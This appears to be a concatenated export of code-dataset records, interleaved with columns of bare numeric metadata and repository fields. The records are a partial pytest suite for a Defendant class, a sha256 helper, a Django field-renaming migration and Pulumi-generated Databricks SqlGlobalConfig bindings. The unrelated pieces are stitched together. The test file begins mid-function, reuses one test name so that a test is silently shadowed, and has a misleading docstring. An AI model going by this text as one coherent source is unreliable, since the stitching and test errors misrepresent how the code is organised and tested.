assert "The value failed to validate. It should be a string of non-zero length with no whitespace." in str(exc_info.__dict__)
def test_set_first_tooshort():
'''This tests that a string of zero length will not set and will raise the appropriate error'''
with pytest.raises(Exception) as exc_info:
my_defendant = Defendant("", "Smith", date(2010,1, 1))
exception_raised = exc_info.value
assert type(ValueError()) == type(exception_raised)
assert "The value failed to validate. It should be a string of non-zero length with no whitespace." in str(exc_info.__dict__)
def test_set_first_non_string():
'''This tests that a non-string inut for first will not set and will raise the appropriate error'''
with pytest.raises(Exception) as exc_info:
my_defendant = Defendant(42, "Smith", date(2010,1, 1))
exception_raised = exc_info.value
assert type(ValueError()) == type(exception_raised)
assert "The value failed to validate. It should be a string of non-zero length with no whitespace." in str(exc_info.__dict__)
def test_property_first_setter():
'''This tests the property.setter for first.'''
my_defendant = Defendant("John", "Smith", date(2010,1, 1))
assert "John" == my_defendant._first
assert "John" == my_defendant.first
my_defendant.first = "Mike"
assert "Mike" == my_defendant._first
assert "Mike" == my_defendant.first
def test_set_last_over25():
'''This tests that only the first 25 chars of a last name are included'''
my_defendant = Defendant("John", "aaaaaaaaaaaaaaaaaaaaaaaabc", date(2010,1, 1))
assert "aaaaaaaaaaaaaaaaaaaaaaaab" == my_defendant._last
assert "aaaaaaaaaaaaaaaaaaaaaaaab" == my_defendant.last
def test_set_last_noncontiguous():
'''This tests that a non-contiguous string for a last name yields the appropriate error.'''
with pytest.raises(Exception) as exc_info:
my_defendant = Defendant("John", "a a", date(2010,1, 1))
exception_raised = exc_info.value
assert type(ValueError()) == type(exception_raised)
assert "The value failed to validate. It should be a string of non-zero length with no whitespace." in str(exc_info.__dict__)
def test_set_last_tooshort():
'''This tests that a last name of zero length will not set and will raise the appropriate error'''
with pytest.raises(Exception) as exc_info:
my_defendant = Defendant("John", "", date(2010,1, 1))
exception_raised = exc_info.value
assert type(ValueError()) == type(exception_raised)
assert "The value failed to validate. It should be a string of non-zero length with no whitespace." in str(exc_info.__dict__)
def test_set_first_non_string():
'''This tests that a non-string inut for first will not set and will raise the appropriate error'''
with pytest.raises(Exception) as exc_info:
my_defendant = Defendant("John", 42, date(2010,1, 1))
exception_raised = exc_info.value
assert type(ValueError()) == type(exception_raised)
assert "The value failed to validate. It should be a string of non-zero length with no whitespace." in str(exc_info.__dict__)
def test_set_birthdate():
'''This tests that a non-string inut for first will not set and will raise the appropriate error'''
with pytest.raises(Exception) as exc_info:
my_defendant = Defendant("John", "Smith", "bad input") # test from init
exception_raised = exc_info.value
assert type(ValueError()) == type(exception_raised)
assert "The birthdate must be a datetime date object." in str(exc_info.__dict__)
my_defendant = Defendant("John", "Smith", date(2010,1, 1))
with pytest.raises(Exception) as exc_info:
my_defendant.birthdate = "bad_data"
exception_raised = exc_info.value
assert type(ValueError()) == type(exception_raised)
assert "The birthdate must be a datetime date object." in str(exc_info.__dict__)
assert date(2010,1, 1) == my_defendant._birthdate
assert date(2010,1, 1) == my_defendant.birthdate
with pytest.raises(Exception) as exc_info:
my_defendant.set_birthdate("bad_data")
exception_raised = exc_info.value
assert type(ValueError()) == type(exception_raised)
assert "The birthdate must be a datetime date object." in str(exc_info.__dict__)
assert date(2010,1, 1) == my_defendant._birthdate
assert date(2010,1, 1) == my_defendant.birthdate
def test_property_birthdate_setter():
'''This tests the property.setter for birthdate resetting a valid value'''
my_defendant = Defendant("John", "Smith", date(2010,1, 1))
assert date(2010,1, 1) == my_defendant._birthdate
assert date(2010,1, 1) == my_defendant.birthdate
new_date = date(2010,1, 2)
my_defendant.birthdate = new_date
assert date(2010,1, 2) == my_defendant._birthdate
assert date(2010,1, 2) == my_defendant.birthdate
def test_property_fullname():
'''This tests the return of the property fullname.'''
my_defendant = Defendant("John", "Smith", date(2010,1, 1))
assert "John Smith" == my_defendant.fullname
def test_validate_contiguous_str():
'''This should test the validation of a contiguous string with the helper method.'''
my_defendant = Defendant("John", "Smith", date(2010,1, 1))
with pytest.raises(Exception) as exc_info:
my_defendant.validate_contiguous_str('') # too short
exception_raised = exc_info.value
assert type(ValueError()) == type(exception_raised)
assert "The value failed to validate. It should be a string of non-zero length with no whitespace." in str(exc_info.__dict__)
with pytest.raises(Exception) as exc_info:
my_defendant.validate_contiguous_str(42) # wrong type
exception_raised = exc_info.value
assert type(ValueError()) == type(exception_raised)
assert "The value failed to validate. It should be a string of non-zero length with no whitespace." in str(exc_info.__dict__)
with pytest.raises(Exception) as exc_info:
my_defendant.validate_contiguous_str('a a') # whitespace between chars
exception_raised = exc_info.value
assert type(ValueError()) == type(exception_raised)
assert "The value failed to validate. It should be a string of non-zero length with no whitespace." in str(exc_info.__dict__)
def test_last_setter():
'''This tests the last setter. requires a contiguous string with no intervening whitespace, non-zero length'''
my_defendant = Defendant("John", "Smith", date(2010,1, 1))
my_defendant.last = "Helsabeck"
assert "Helsabeck" == my_defendant.last
assert "Helsabeck" == my_defendant._last
with pytest.raises(Exception) as exc_info:
my_defendant.last = '' # too short
exception_raised = exc_info.value
assert type(ValueError()) == type(exception_raised)
assert "The value failed to validate. It should be a string of non-zero length with no whitespace." in str(exc_info.__dict__)
with pytest.raises(Exception) as exc_info:
my_defendant.last =42 # wrong type
exception_raised = exc_info.value
assert type(ValueError()) == type(exception_raised)
assert "The value failed to validate. It should be a string of non-zero length with no whitespace." in str(exc_info.__dict__)
with pytest.raises(Exception) as exc_info:
my_defendant.last = 'a a' # whitespace between chars
exception_raised = exc_info.value
assert type(ValueError()) == type(exception_raised)
assert "The value failed to validate. It should be a string of non-zero length with no whitespace." in str(exc_info.__dict__)
| 52.289941
| 129
| 0.72253
| 1,273
| 8,837
| 4.817753
| 0.080911
| 0.093266
| 0.039622
| 0.039133
| 0.886842
| 0.846894
| 0.812164
| 0.791293
| 0.762596
| 0.748899
| 0
| 0.024856
| 0.175965
| 8,837
| 169
| 130
| 52.289941
| 0.817358
| 0.143827
| 0
| 0.595588
| 0
| 0
| 0.213226
| 0.020307
| 0
| 0
| 0
| 0
| 0.404412
| 1
| 0.117647
| false
| 0
| 0.029412
| 0
| 0.154412
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
15db3ddd354bc29ad39ca0a51369700305870329
| 86
|
py
|
Python
|
blob/hashers.py
|
artgromov/blob_storage
|
8d3946eb624041da8f8512a5e9afc47c59a80b27
|
[
"MIT"
] | null | null | null |
blob/hashers.py
|
artgromov/blob_storage
|
8d3946eb624041da8f8512a5e9afc47c59a80b27
|
[
"MIT"
] | null | null | null |
blob/hashers.py
|
artgromov/blob_storage
|
8d3946eb624041da8f8512a5e9afc47c59a80b27
|
[
"MIT"
] | null | null | null |
import hashlib
def sha256(data: bytes):
return hashlib.sha256(data).hexdigest()
| 14.333333
| 43
| 0.732558
| 11
| 86
| 5.727273
| 0.727273
| 0.31746
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.082192
| 0.151163
| 86
| 5
| 44
| 17.2
| 0.780822
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
c605cc489a32643bc2a1e9bd1ed66ca8feb412a7
| 2,138
|
py
|
Python
|
brambling/migrations/0041_auto_20160104_2321.py
|
Shivanjain023/django-brambling
|
17539b82df37f22bd2b4293e73142b887c916344
|
[
"BSD-3-Clause"
] | 8
|
2015-05-06T18:26:15.000Z
|
2018-02-07T22:18:32.000Z
|
brambling/migrations/0041_auto_20160104_2321.py
|
Shivanjain023/django-brambling
|
17539b82df37f22bd2b4293e73142b887c916344
|
[
"BSD-3-Clause"
] | 578
|
2015-01-05T21:37:17.000Z
|
2018-02-14T16:43:50.000Z
|
brambling/migrations/0041_auto_20160104_2321.py
|
Shivanjain023/django-brambling
|
17539b82df37f22bd2b4293e73142b887c916344
|
[
"BSD-3-Clause"
] | 1
|
2015-08-20T16:59:32.000Z
|
2015-08-20T16:59:32.000Z
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('brambling', '0040_auto_20151223_0821'),
]
operations = [
migrations.RenameField(
model_name='attendee',
old_name='given_name',
new_name='first_name',
),
migrations.RenameField(
model_name='attendee',
old_name='surname',
new_name='last_name',
),
migrations.RenameField(
model_name='person',
old_name='given_name',
new_name='first_name',
),
migrations.RenameField(
model_name='person',
old_name='surname',
new_name='last_name',
),
migrations.RenameField(
model_name='savedattendee',
old_name='given_name',
new_name='first_name',
),
migrations.RenameField(
model_name='savedattendee',
old_name='surname',
new_name='last_name',
),
migrations.AlterField(
model_name='attendee',
name='name_order',
field=models.CharField(default='GMS', max_length=3, choices=[('GMS', 'First Middle Surname'), ('SGM', 'Surname First Middle'), ('GS', 'First Surname'), ('SG', 'Surname First')]),
preserve_default=True,
),
migrations.AlterField(
model_name='person',
name='name_order',
field=models.CharField(default='GMS', max_length=3, choices=[('GMS', 'First Middle Surname'), ('SGM', 'Surname First Middle'), ('GS', 'First Surname'), ('SG', 'Surname First')]),
preserve_default=True,
),
migrations.AlterField(
model_name='savedattendee',
name='name_order',
field=models.CharField(default='GMS', max_length=3, choices=[('GMS', 'First Middle Surname'), ('SGM', 'Surname First Middle'), ('GS', 'First Surname'), ('SG', 'Surname First')]),
preserve_default=True,
),
]
| 33.936508
| 190
| 0.553789
| 202
| 2,138
| 5.628713
| 0.242574
| 0.07124
| 0.137203
| 0.158311
| 0.819701
| 0.819701
| 0.819701
| 0.779244
| 0.711522
| 0.711522
| 0
| 0.013459
| 0.304958
| 2,138
| 62
| 191
| 34.483871
| 0.751682
| 0.009822
| 0
| 0.857143
| 0
| 0
| 0.230733
| 0.010875
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.035714
| 0
| 0.089286
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c64efa14652aa58df8fd24946d8d088bd0f32ef6
| 25,255
|
py
|
Python
|
sdk/python/pulumi_databricks/sql_global_config.py
|
pulumi/pulumi-databricks
|
43580d4adbd04b72558f368ff0eef3d03432ebc1
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_databricks/sql_global_config.py
|
pulumi/pulumi-databricks
|
43580d4adbd04b72558f368ff0eef3d03432ebc1
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_databricks/sql_global_config.py
|
pulumi/pulumi-databricks
|
43580d4adbd04b72558f368ff0eef3d03432ebc1
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = ['SqlGlobalConfigArgs', 'SqlGlobalConfig']
@pulumi.input_type
class SqlGlobalConfigArgs:
def __init__(__self__, *,
data_access_config: Optional[pulumi.Input[Mapping[str, Any]]] = None,
enable_serverless_compute: Optional[pulumi.Input[bool]] = None,
instance_profile_arn: Optional[pulumi.Input[str]] = None,
security_policy: Optional[pulumi.Input[str]] = None,
sql_config_params: Optional[pulumi.Input[Mapping[str, Any]]] = None):
"""
The set of arguments for constructing a SqlGlobalConfig resource.
:param pulumi.Input[Mapping[str, Any]] data_access_config: - data access configuration for databricks_sql_endpoint, such as configuration for an external Hive metastore, Hadoop Filesystem configuration, etc. Please note that the list of supported configuration properties is limited, so refer to the [documentation](https://docs.databricks.com/sql/admin/data-access-configuration.html#supported-properties) for a full list. Apply will fail if you're specifying not permitted configuration.
:param pulumi.Input[str] instance_profile_arn: - InstanceProfile used to access storage from databricks_sql_endpoint. Please note that this parameter is only for AWS, and will generate an error if used on other clouds.
:param pulumi.Input[str] security_policy: - The policy for controlling access to datasets. Default value: `DATA_ACCESS_CONTROL`, consult documentation for list of possible values
:param pulumi.Input[Mapping[str, Any]] sql_config_params: - SQL Configuration Parameters let you override the default behavior for all sessions with all endpoints.
"""
if data_access_config is not None:
pulumi.set(__self__, "data_access_config", data_access_config)
if enable_serverless_compute is not None:
pulumi.set(__self__, "enable_serverless_compute", enable_serverless_compute)
if instance_profile_arn is not None:
pulumi.set(__self__, "instance_profile_arn", instance_profile_arn)
if security_policy is not None:
pulumi.set(__self__, "security_policy", security_policy)
if sql_config_params is not None:
pulumi.set(__self__, "sql_config_params", sql_config_params)
@property
@pulumi.getter(name="dataAccessConfig")
def data_access_config(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
- data access configuration for databricks_sql_endpoint, such as configuration for an external Hive metastore, Hadoop Filesystem configuration, etc. Please note that the list of supported configuration properties is limited, so refer to the [documentation](https://docs.databricks.com/sql/admin/data-access-configuration.html#supported-properties) for a full list. Apply will fail if you're specifying not permitted configuration.
"""
return pulumi.get(self, "data_access_config")
@data_access_config.setter
def data_access_config(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "data_access_config", value)
@property
@pulumi.getter(name="enableServerlessCompute")
def enable_serverless_compute(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "enable_serverless_compute")
@enable_serverless_compute.setter
def enable_serverless_compute(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_serverless_compute", value)
@property
@pulumi.getter(name="instanceProfileArn")
def instance_profile_arn(self) -> Optional[pulumi.Input[str]]:
"""
- InstanceProfile used to access storage from databricks_sql_endpoint. Please note that this parameter is only for AWS, and will generate an error if used on other clouds.
"""
return pulumi.get(self, "instance_profile_arn")
@instance_profile_arn.setter
def instance_profile_arn(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "instance_profile_arn", value)
@property
@pulumi.getter(name="securityPolicy")
def security_policy(self) -> Optional[pulumi.Input[str]]:
"""
- The policy for controlling access to datasets. Default value: `DATA_ACCESS_CONTROL`, consult documentation for list of possible values
"""
return pulumi.get(self, "security_policy")
@security_policy.setter
def security_policy(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "security_policy", value)
@property
@pulumi.getter(name="sqlConfigParams")
def sql_config_params(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
- SQL Configuration Parameters let you override the default behavior for all sessions with all endpoints.
"""
return pulumi.get(self, "sql_config_params")
@sql_config_params.setter
def sql_config_params(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "sql_config_params", value)
@pulumi.input_type
class _SqlGlobalConfigState:
def __init__(__self__, *,
data_access_config: Optional[pulumi.Input[Mapping[str, Any]]] = None,
enable_serverless_compute: Optional[pulumi.Input[bool]] = None,
instance_profile_arn: Optional[pulumi.Input[str]] = None,
security_policy: Optional[pulumi.Input[str]] = None,
sql_config_params: Optional[pulumi.Input[Mapping[str, Any]]] = None):
"""
Input properties used for looking up and filtering SqlGlobalConfig resources.
:param pulumi.Input[Mapping[str, Any]] data_access_config: - data access configuration for databricks_sql_endpoint, such as configuration for an external Hive metastore, Hadoop Filesystem configuration, etc. Please note that the list of supported configuration properties is limited, so refer to the [documentation](https://docs.databricks.com/sql/admin/data-access-configuration.html#supported-properties) for a full list. Apply will fail if you're specifying not permitted configuration.
:param pulumi.Input[str] instance_profile_arn: - InstanceProfile used to access storage from databricks_sql_endpoint. Please note that this parameter is only for AWS, and will generate an error if used on other clouds.
:param pulumi.Input[str] security_policy: - The policy for controlling access to datasets. Default value: `DATA_ACCESS_CONTROL`, consult documentation for list of possible values
:param pulumi.Input[Mapping[str, Any]] sql_config_params: - SQL Configuration Parameters let you override the default behavior for all sessions with all endpoints.
"""
if data_access_config is not None:
pulumi.set(__self__, "data_access_config", data_access_config)
if enable_serverless_compute is not None:
pulumi.set(__self__, "enable_serverless_compute", enable_serverless_compute)
if instance_profile_arn is not None:
pulumi.set(__self__, "instance_profile_arn", instance_profile_arn)
if security_policy is not None:
pulumi.set(__self__, "security_policy", security_policy)
if sql_config_params is not None:
pulumi.set(__self__, "sql_config_params", sql_config_params)
@property
@pulumi.getter(name="dataAccessConfig")
def data_access_config(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
- data access configuration for databricks_sql_endpoint, such as configuration for an external Hive metastore, Hadoop Filesystem configuration, etc. Please note that the list of supported configuration properties is limited, so refer to the [documentation](https://docs.databricks.com/sql/admin/data-access-configuration.html#supported-properties) for a full list. Apply will fail if you're specifying not permitted configuration.
"""
return pulumi.get(self, "data_access_config")
@data_access_config.setter
def data_access_config(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "data_access_config", value)
@property
@pulumi.getter(name="enableServerlessCompute")
def enable_serverless_compute(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "enable_serverless_compute")
@enable_serverless_compute.setter
def enable_serverless_compute(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_serverless_compute", value)
@property
@pulumi.getter(name="instanceProfileArn")
def instance_profile_arn(self) -> Optional[pulumi.Input[str]]:
"""
- InstanceProfile used to access storage from databricks_sql_endpoint. Please note that this parameter is only for AWS, and will generate an error if used on other clouds.
"""
return pulumi.get(self, "instance_profile_arn")
@instance_profile_arn.setter
def instance_profile_arn(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "instance_profile_arn", value)
@property
@pulumi.getter(name="securityPolicy")
def security_policy(self) -> Optional[pulumi.Input[str]]:
"""
- The policy for controlling access to datasets. Default value: `DATA_ACCESS_CONTROL`, consult documentation for list of possible values
"""
return pulumi.get(self, "security_policy")
@security_policy.setter
def security_policy(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "security_policy", value)
@property
@pulumi.getter(name="sqlConfigParams")
def sql_config_params(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
- SQL Configuration Parameters let you override the default behavior for all sessions with all endpoints.
"""
return pulumi.get(self, "sql_config_params")
@sql_config_params.setter
def sql_config_params(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "sql_config_params", value)
class SqlGlobalConfig(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
data_access_config: Optional[pulumi.Input[Mapping[str, Any]]] = None,
enable_serverless_compute: Optional[pulumi.Input[bool]] = None,
instance_profile_arn: Optional[pulumi.Input[str]] = None,
security_policy: Optional[pulumi.Input[str]] = None,
sql_config_params: Optional[pulumi.Input[Mapping[str, Any]]] = None,
__props__=None):
"""
This resource configures the security policy, databricks_instance_profile, and [data access properties](https://docs.databricks.com/sql/admin/data-access-configuration.html) for all SqlEndpoint of workspace. *Please note that changing parameters of this resources will restart all running databricks_sql_endpoint.* To use this resource you need to be an administrator.
## Example Usage
### AWS example
```python
import pulumi
import pulumi_databricks as databricks
this = databricks.SqlGlobalConfig("this",
security_policy="DATA_ACCESS_CONTROL",
instance_profile_arn="arn:....",
data_access_config={
"spark.sql.session.timeZone": "UTC",
})
```
### Azure example
For Azure you should use the `data_access_config` to provide the service principal configuration. You can use the Databricks SQL Admin Console UI to help you generate the right configuration values.
```python
import pulumi
import pulumi_databricks as databricks
this = databricks.SqlGlobalConfig("this",
security_policy="DATA_ACCESS_CONTROL",
data_access_config={
"spark.hadoop.fs.azure.account.auth.type": "OAuth",
"spark.hadoop.fs.azure.account.oauth.provider.type": "org.apache.hadoop.fs.azurebfs.oauth2.ClientCredsTokenProvider",
"spark.hadoop.fs.azure.account.oauth2.client.id": var["tenant_id"],
"spark.hadoop.fs.azure.account.oauth2.client.secret": f"{{{{secrets/{local['secret_scope']}/{local['secret_key']}}}}}",
"spark.hadoop.fs.azure.account.oauth2.client.endpoint": f"https://login.microsoftonline.com/{var['tenant_id']}/oauth2/token",
},
sql_config_params={
"ANSI_MODE": "true",
})
```
## Related Resources
The following resources are often used in the same context:
* End to end workspace management guide.
* InstanceProfile to manage AWS EC2 instance profiles that users can launch Cluster and access data, like databricks_mount.
* SqlDashboard to manage Databricks SQL [Dashboards](https://docs.databricks.com/sql/user/dashboards/index.html).
* SqlEndpoint to manage Databricks SQL [Endpoints](https://docs.databricks.com/sql/admin/sql-endpoints.html).
* SqlPermissions to manage data object access control lists in Databricks workspaces for things like tables, views, databases, and [more](https://docs.databricks.com/security/access-control/table-acls/object-privileges.html).
## Import
You can import a `databricks_sql_global_config` resource with command like the following (you need to use `global` as ID)bash
```sh
$ pulumi import databricks:index/sqlGlobalConfig:SqlGlobalConfig this global
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Mapping[str, Any]] data_access_config: - data access configuration for databricks_sql_endpoint, such as configuration for an external Hive metastore, Hadoop Filesystem configuration, etc. Please note that the list of supported configuration properties is limited, so refer to the [documentation](https://docs.databricks.com/sql/admin/data-access-configuration.html#supported-properties) for a full list. Apply will fail if you're specifying not permitted configuration.
:param pulumi.Input[str] instance_profile_arn: - InstanceProfile used to access storage from databricks_sql_endpoint. Please note that this parameter is only for AWS, and will generate an error if used on other clouds.
:param pulumi.Input[str] security_policy: - The policy for controlling access to datasets. Default value: `DATA_ACCESS_CONTROL`, consult documentation for list of possible values
:param pulumi.Input[Mapping[str, Any]] sql_config_params: - SQL Configuration Parameters let you override the default behavior for all sessions with all endpoints.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: Optional[SqlGlobalConfigArgs] = None,
opts: Optional[pulumi.ResourceOptions] = None):
"""
This resource configures the security policy, databricks_instance_profile, and [data access properties](https://docs.databricks.com/sql/admin/data-access-configuration.html) for all SqlEndpoint of workspace. *Please note that changing parameters of this resources will restart all running databricks_sql_endpoint.* To use this resource you need to be an administrator.
## Example Usage
### AWS example
```python
import pulumi
import pulumi_databricks as databricks
this = databricks.SqlGlobalConfig("this",
security_policy="DATA_ACCESS_CONTROL",
instance_profile_arn="arn:....",
data_access_config={
"spark.sql.session.timeZone": "UTC",
})
```
### Azure example
For Azure you should use the `data_access_config` to provide the service principal configuration. You can use the Databricks SQL Admin Console UI to help you generate the right configuration values.
```python
import pulumi
import pulumi_databricks as databricks
this = databricks.SqlGlobalConfig("this",
security_policy="DATA_ACCESS_CONTROL",
data_access_config={
"spark.hadoop.fs.azure.account.auth.type": "OAuth",
"spark.hadoop.fs.azure.account.oauth.provider.type": "org.apache.hadoop.fs.azurebfs.oauth2.ClientCredsTokenProvider",
"spark.hadoop.fs.azure.account.oauth2.client.id": var["tenant_id"],
"spark.hadoop.fs.azure.account.oauth2.client.secret": f"{{{{secrets/{local['secret_scope']}/{local['secret_key']}}}}}",
"spark.hadoop.fs.azure.account.oauth2.client.endpoint": f"https://login.microsoftonline.com/{var['tenant_id']}/oauth2/token",
},
sql_config_params={
"ANSI_MODE": "true",
})
```
## Related Resources
The following resources are often used in the same context:
* End to end workspace management guide.
* InstanceProfile to manage AWS EC2 instance profiles that users can launch Cluster and access data, like databricks_mount.
* SqlDashboard to manage Databricks SQL [Dashboards](https://docs.databricks.com/sql/user/dashboards/index.html).
* SqlEndpoint to manage Databricks SQL [Endpoints](https://docs.databricks.com/sql/admin/sql-endpoints.html).
* SqlPermissions to manage data object access control lists in Databricks workspaces for things like tables, views, databases, and [more](https://docs.databricks.com/security/access-control/table-acls/object-privileges.html).
## Import
You can import a `databricks_sql_global_config` resource with command like the following (you need to use `global` as ID)bash
```sh
$ pulumi import databricks:index/sqlGlobalConfig:SqlGlobalConfig this global
```
:param str resource_name: The name of the resource.
:param SqlGlobalConfigArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(SqlGlobalConfigArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
data_access_config: Optional[pulumi.Input[Mapping[str, Any]]] = None,
enable_serverless_compute: Optional[pulumi.Input[bool]] = None,
instance_profile_arn: Optional[pulumi.Input[str]] = None,
security_policy: Optional[pulumi.Input[str]] = None,
sql_config_params: Optional[pulumi.Input[Mapping[str, Any]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = SqlGlobalConfigArgs.__new__(SqlGlobalConfigArgs)
__props__.__dict__["data_access_config"] = data_access_config
__props__.__dict__["enable_serverless_compute"] = enable_serverless_compute
__props__.__dict__["instance_profile_arn"] = instance_profile_arn
__props__.__dict__["security_policy"] = security_policy
__props__.__dict__["sql_config_params"] = sql_config_params
super(SqlGlobalConfig, __self__).__init__(
'databricks:index/sqlGlobalConfig:SqlGlobalConfig',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
data_access_config: Optional[pulumi.Input[Mapping[str, Any]]] = None,
enable_serverless_compute: Optional[pulumi.Input[bool]] = None,
instance_profile_arn: Optional[pulumi.Input[str]] = None,
security_policy: Optional[pulumi.Input[str]] = None,
sql_config_params: Optional[pulumi.Input[Mapping[str, Any]]] = None) -> 'SqlGlobalConfig':
"""
Get an existing SqlGlobalConfig resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Mapping[str, Any]] data_access_config: - data access configuration for databricks_sql_endpoint, such as configuration for an external Hive metastore, Hadoop Filesystem configuration, etc. Please note that the list of supported configuration properties is limited, so refer to the [documentation](https://docs.databricks.com/sql/admin/data-access-configuration.html#supported-properties) for a full list. Apply will fail if you're specifying not permitted configuration.
:param pulumi.Input[str] instance_profile_arn: - InstanceProfile used to access storage from databricks_sql_endpoint. Please note that this parameter is only for AWS, and will generate an error if used on other clouds.
:param pulumi.Input[str] security_policy: - The policy for controlling access to datasets. Default value: `DATA_ACCESS_CONTROL`, consult documentation for list of possible values
:param pulumi.Input[Mapping[str, Any]] sql_config_params: - SQL Configuration Parameters let you override the default behavior for all sessions with all endpoints.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _SqlGlobalConfigState.__new__(_SqlGlobalConfigState)
__props__.__dict__["data_access_config"] = data_access_config
__props__.__dict__["enable_serverless_compute"] = enable_serverless_compute
__props__.__dict__["instance_profile_arn"] = instance_profile_arn
__props__.__dict__["security_policy"] = security_policy
__props__.__dict__["sql_config_params"] = sql_config_params
return SqlGlobalConfig(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="dataAccessConfig")
def data_access_config(self) -> pulumi.Output[Optional[Mapping[str, Any]]]:
"""
- data access configuration for databricks_sql_endpoint, such as configuration for an external Hive metastore, Hadoop Filesystem configuration, etc. Please note that the list of supported configuration properties is limited, so refer to the [documentation](https://docs.databricks.com/sql/admin/data-access-configuration.html#supported-properties) for a full list. Apply will fail if you're specifying not permitted configuration.
"""
return pulumi.get(self, "data_access_config")
@property
@pulumi.getter(name="enableServerlessCompute")
def enable_serverless_compute(self) -> pulumi.Output[Optional[bool]]:
return pulumi.get(self, "enable_serverless_compute")
@property
@pulumi.getter(name="instanceProfileArn")
def instance_profile_arn(self) -> pulumi.Output[Optional[str]]:
"""
- InstanceProfile used to access storage from databricks_sql_endpoint. Please note that this parameter is only for AWS, and will generate an error if used on other clouds.
"""
return pulumi.get(self, "instance_profile_arn")
@property
@pulumi.getter(name="securityPolicy")
def security_policy(self) -> pulumi.Output[Optional[str]]:
"""
- The policy for controlling access to datasets. Default value: `DATA_ACCESS_CONTROL`, consult documentation for list of possible values
"""
return pulumi.get(self, "security_policy")
@property
@pulumi.getter(name="sqlConfigParams")
def sql_config_params(self) -> pulumi.Output[Optional[Mapping[str, Any]]]:
"""
- SQL Configuration Parameters let you override the default behavior for all sessions with all endpoints.
"""
return pulumi.get(self, "sql_config_params")
| 58.869464
| 499
| 0.702594
| 3,045
| 25,255
| 5.617077
| 0.090312
| 0.038587
| 0.049988
| 0.031922
| 0.90166
| 0.892774
| 0.892774
| 0.885816
| 0.880145
| 0.876696
| 0
| 0.000649
| 0.207365
| 25,255
| 428
| 500
| 59.007009
| 0.853782
| 0.511542
| 0
| 0.777228
| 1
| 0
| 0.123498
| 0.030897
| 0
| 0
| 0
| 0
| 0
| 1
| 0.158416
| false
| 0.004951
| 0.024752
| 0.014851
| 0.277228
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
